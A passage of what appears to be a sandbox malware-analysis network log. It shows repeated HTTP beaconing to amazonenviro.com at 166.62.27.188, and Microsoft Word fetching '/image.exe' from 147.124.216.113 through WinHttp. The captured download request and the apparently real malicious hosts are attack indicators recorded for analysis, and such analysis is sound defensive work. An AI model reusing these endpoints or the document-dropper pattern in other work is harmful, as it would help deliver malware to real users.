              Jan 10, 2025 09:01:05.065462112 CET5020580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:05.065542936 CET5020580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:05.070312977 CET8050205166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:06.028060913 CET8050205166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:06.028125048 CET8050205166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:06.028192997 CET5020580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.028304100 CET5020580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.033164024 CET8050205166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:06.143260956 CET5020680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.148483992 CET8050206166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:06.148600101 CET5020680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.148718119 CET5020680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.150477886 CET5020780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.153708935 CET8050206166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:06.153773069 CET5020680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.155406952 CET8050207166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:06.155476093 CET5020780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.155574083 CET5020780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:06.160388947 CET8050207166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:07.124660969 CET8050207166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:07.124857903 CET8050207166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:07.125032902 CET5020780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.125034094 CET5020780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.129956961 CET8050207166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:07.239203930 CET5020880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.244376898 CET8050208166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:07.248665094 CET5020880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.248851061 CET5020880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.250669003 CET5020980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.253727913 CET8050208166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:07.255589008 CET8050209166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:07.255724907 CET5020880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.255758047 CET5020980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.255984068 CET5020980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:07.260902882 CET8050209166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:08.205307961 CET8050209166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:08.205363989 CET8050209166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:08.205516100 CET5020980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.205516100 CET5020980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.210480928 CET8050209166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:08.319576025 CET5021080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.324667931 CET8050210166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:08.324763060 CET5021080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.324893951 CET5021080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.326915979 CET5021180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.329898119 CET8050210166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:08.329967022 CET5021080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.331938028 CET8050211166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:08.332025051 CET5021180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.332134962 CET5021180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:08.336945057 CET8050211166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:09.279850006 CET8050211166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:09.279948950 CET8050211166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:09.280147076 CET5021180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.280258894 CET5021180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.285206079 CET8050211166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:09.397654057 CET5021280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.402580976 CET8050212166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:09.402667999 CET5021280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.402784109 CET5021280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.404763937 CET5021380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.407864094 CET8050212166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:09.408080101 CET5021280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.409598112 CET8050213166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:09.409672022 CET5021380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.409817934 CET5021380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:09.414592028 CET8050213166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.443205118 CET8050213166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.443264961 CET8050213166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.443295956 CET8050213166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.443695068 CET5021380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.444905996 CET5021380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.450120926 CET8050213166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.560796022 CET5021480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.565843105 CET8050214166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.565934896 CET5021480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.566020966 CET5021480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.567806959 CET5021580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.571048021 CET8050214166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.571120024 CET5021480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.574506998 CET8050215166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:10.574587107 CET5021580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.574687958 CET5021580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:10.579539061 CET8050215166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:11.519539118 CET8050215166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:11.519620895 CET8050215166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:11.520009041 CET5021580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.520009041 CET5021580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.525378942 CET8050215166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:11.637193918 CET5021680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.642343998 CET8050216166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:11.642446041 CET5021680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.642554045 CET5021680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.647469997 CET8050216166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:11.647552013 CET5021680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.650198936 CET5021780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.655144930 CET8050217166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:11.655249119 CET5021780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.655401945 CET5021780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:11.660409927 CET8050217166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:12.572865009 CET8050217166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:12.573299885 CET8050217166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:12.573390961 CET5021780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.573497057 CET5021780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.578351021 CET8050217166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:12.695677996 CET5021880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.700841904 CET8050218166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:12.701025963 CET5021880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.701345921 CET5021880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.703969002 CET5021980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.706252098 CET8050218166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:12.706331015 CET5021880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.708863974 CET8050219166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:12.708951950 CET5021980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.709110975 CET5021980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:12.714392900 CET8050219166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:13.637475967 CET8050219166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:13.637548923 CET8050219166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:13.637643099 CET5021980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.637720108 CET5021980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.642965078 CET8050219166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:13.758707047 CET5022080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.763999939 CET8050220166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:13.764225960 CET5022080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.764501095 CET5022080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.769623995 CET8050220166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:13.769696951 CET5022080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.798228025 CET5022180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.803416967 CET8050221166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:13.803522110 CET5022180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.803654909 CET5022180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:13.808487892 CET8050221166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:14.739552975 CET8050221166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:14.739744902 CET8050221166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:14.739814997 CET5022180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.739902020 CET5022180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.744885921 CET8050221166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:14.859719992 CET5022280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.865233898 CET8050222166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:14.865612030 CET5022280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.865830898 CET5022280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.868279934 CET5022380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.870810032 CET8050222166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:14.870894909 CET5022280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.873203993 CET8050223166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:14.873318911 CET5022380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.873559952 CET5022380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:14.878441095 CET8050223166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:15.790632963 CET8050223166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:15.791369915 CET8050223166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:15.791538000 CET5022380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.791538000 CET5022380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.797167063 CET8050223166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:15.910861969 CET5022480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.915991068 CET8050224166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:15.916075945 CET5022480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.916198969 CET5022480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.918301105 CET5022580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.921241045 CET8050224166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:15.921318054 CET5022480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.923155069 CET8050225166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:15.923219919 CET5022580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.923348904 CET5022580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:15.928309917 CET8050225166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:16.849894047 CET8050225166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:16.849946976 CET8050225166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:16.850006104 CET5022580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.850219965 CET5022580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.855114937 CET8050225166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:16.967502117 CET5022680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.972779989 CET8050226166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:16.972878933 CET5022680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.973010063 CET5022680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.975272894 CET5022780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.977932930 CET8050226166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:16.978003025 CET5022680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.980201006 CET8050227166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:16.980273962 CET5022780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.980406046 CET5022780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:16.985229969 CET8050227166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:17.908380032 CET8050227166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:17.908442020 CET8050227166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:17.908597946 CET5022780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:17.912404060 CET5022780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:17.917258978 CET8050227166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:18.022324085 CET5022880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:18.027715921 CET8050228166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:18.027815104 CET5022880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:18.027975082 CET5022880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:18.030658007 CET5022980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:18.032998085 CET8050228166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:18.033061028 CET5022880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:18.035589933 CET8050229166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:18.035671949 CET5022980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:18.035800934 CET5022980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:18.040687084 CET8050229166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:19.000243902 CET8050229166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:19.000307083 CET8050229166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:19.000519991 CET5022980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.000519991 CET5022980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.005851984 CET8050229166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:19.121855974 CET5023080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.127629995 CET8050230166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:19.127875090 CET5023080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.127953053 CET5023080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.130645990 CET5023180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.133054972 CET8050230166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:19.133131981 CET5023080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.135601044 CET8050231166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:19.135714054 CET5023180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.135947943 CET5023180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:19.140831947 CET8050231166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:20.073010921 CET8050231166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:20.073077917 CET8050231166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:20.073283911 CET5023180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.073380947 CET5023180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.078507900 CET8050231166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:20.195987940 CET5023280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.201706886 CET8050232166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:20.201822996 CET5023280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.202007055 CET5023280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.204653025 CET5023380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.207031012 CET8050232166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:20.207115889 CET5023280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.209589005 CET8050233166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:20.209681034 CET5023380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.209860086 CET5023380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:20.214857101 CET8050233166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:21.121885061 CET8050233166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:21.121942997 CET8050233166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:21.122051954 CET5023380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.122139931 CET5023380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.127409935 CET8050233166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:21.246680975 CET5023480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.252485037 CET8050234166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:21.252803087 CET5023480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.253329992 CET5023480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.255280972 CET5023580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.259212971 CET8050234166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:21.259335041 CET5023480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.260325909 CET8050235166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:21.260446072 CET5023580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.260569096 CET5023580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:21.265923977 CET8050235166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.210985899 CET8050235166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.211177111 CET8050235166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.211292982 CET5023580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.211528063 CET5023580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.216437101 CET8050235166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.337227106 CET5023680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.342612028 CET8050236166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.342727900 CET5023680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.342910051 CET5023680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.345264912 CET5023780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.350629091 CET8050237166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.350718021 CET5023780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.350897074 CET5023780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:22.352155924 CET8050236166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.355811119 CET8050237166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.360740900 CET8050236166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:22.360949993 CET5023680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.327714920 CET8050237166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:23.327806950 CET8050237166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:23.327891111 CET5023780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.327992916 CET5023780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.332848072 CET8050237166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:23.448820114 CET5023880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.454057932 CET8050238166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:23.454308033 CET5023880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.454413891 CET5023880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.457017899 CET5023980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.459500074 CET8050238166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:23.459593058 CET5023880192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.462090015 CET8050239166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:23.462183952 CET5023980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.462342978 CET5023980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:23.467204094 CET8050239166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:24.370398998 CET8050239166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:24.370455980 CET8050239166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:24.370872974 CET5023980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.371120930 CET5023980192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.376388073 CET8050239166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:24.496170044 CET5024080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.501511097 CET8050240166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:24.501600981 CET5024080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.501801968 CET5024080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.504704952 CET5024180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.506867886 CET8050240166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:24.507008076 CET5024080192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.509663105 CET8050241166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:24.509768009 CET5024180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.509913921 CET5024180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:24.514766932 CET8050241166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:25.441354036 CET8050241166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:25.443972111 CET8050241166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:25.444221973 CET5024180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.444221973 CET5024180192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.449254036 CET8050241166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:25.561877012 CET5024280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.567460060 CET8050242166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:25.567938089 CET5024280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.568304062 CET5024280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.571369886 CET5024380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.573396921 CET8050242166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:25.573652029 CET5024280192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.576415062 CET8050243166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:25.576719046 CET5024380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.577210903 CET5024380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:25.582180023 CET8050243166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:26.474482059 CET8050243166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:26.474674940 CET8050243166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:26.474778891 CET5024380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.478663921 CET5024380192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.483747959 CET8050243166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:26.592550039 CET5024480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.597841024 CET8050244166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:26.597964048 CET5024480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.598016024 CET5024480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.603030920 CET8050244166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:26.603101969 CET5024480192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.646172047 CET5024580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.651258945 CET8050245166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:26.651384115 CET5024580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.651557922 CET5024580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:26.656440973 CET8050245166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:27.587016106 CET8050245166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:27.587045908 CET8050245166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:27.587264061 CET5024580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.587265015 CET5024580192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.592143059 CET8050245166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:27.715821028 CET5024680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.720866919 CET8050246166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:27.720963001 CET5024680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.721200943 CET5024680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.723706007 CET5024780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.726073027 CET8050246166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:27.726165056 CET5024680192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.728653908 CET8050247166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:27.728821039 CET5024780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.728924036 CET5024780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:27.733767033 CET8050247166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:28.651297092 CET8050247166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:28.651402950 CET8050247166.62.27.188192.168.2.4
              Jan 10, 2025 09:01:28.651597977 CET5024780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:30.323971033 CET5024780192.168.2.4166.62.27.188
              Jan 10, 2025 09:01:30.330790997 CET8050247166.62.27.188192.168.2.4
              TimestampSource PortDest PortSource IPDest IP
              Jan 10, 2025 08:59:25.833151102 CET5005853192.168.2.41.1.1.1
              Jan 10, 2025 08:59:26.020203114 CET53500581.1.1.1192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jan 10, 2025 08:59:25.833151102 CET192.168.2.41.1.1.10x9cdeStandard query (0)amazonenviro.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jan 10, 2025 08:59:26.020203114 CET1.1.1.1192.168.2.40x9cdeNo error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false
              • 147.124.216.113
              • amazonenviro.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449736147.124.216.113807244C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
              TimestampBytes transferredDirectionData
              Jan 10, 2025 08:58:46.952234983 CET182OUTGET /image.exe HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              Accept-Language: en-ch
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: 147.124.216.113
              Jan 10, 2025 08:58:57.577908039 CET1236INHTTP/1.1 200 OK
              Content-Type: application/octet-stream
              Last-Modified: Tue, 07 Jan 2025 08:16:47 GMT
              Accept-Ranges: bytes
              ETag: "65d1a17edc60db1:0"
              Server: Microsoft-IIS/8.5
              Date: Fri, 10 Jan 2025 07:58:54 GMT
              Content-Length: 1161216
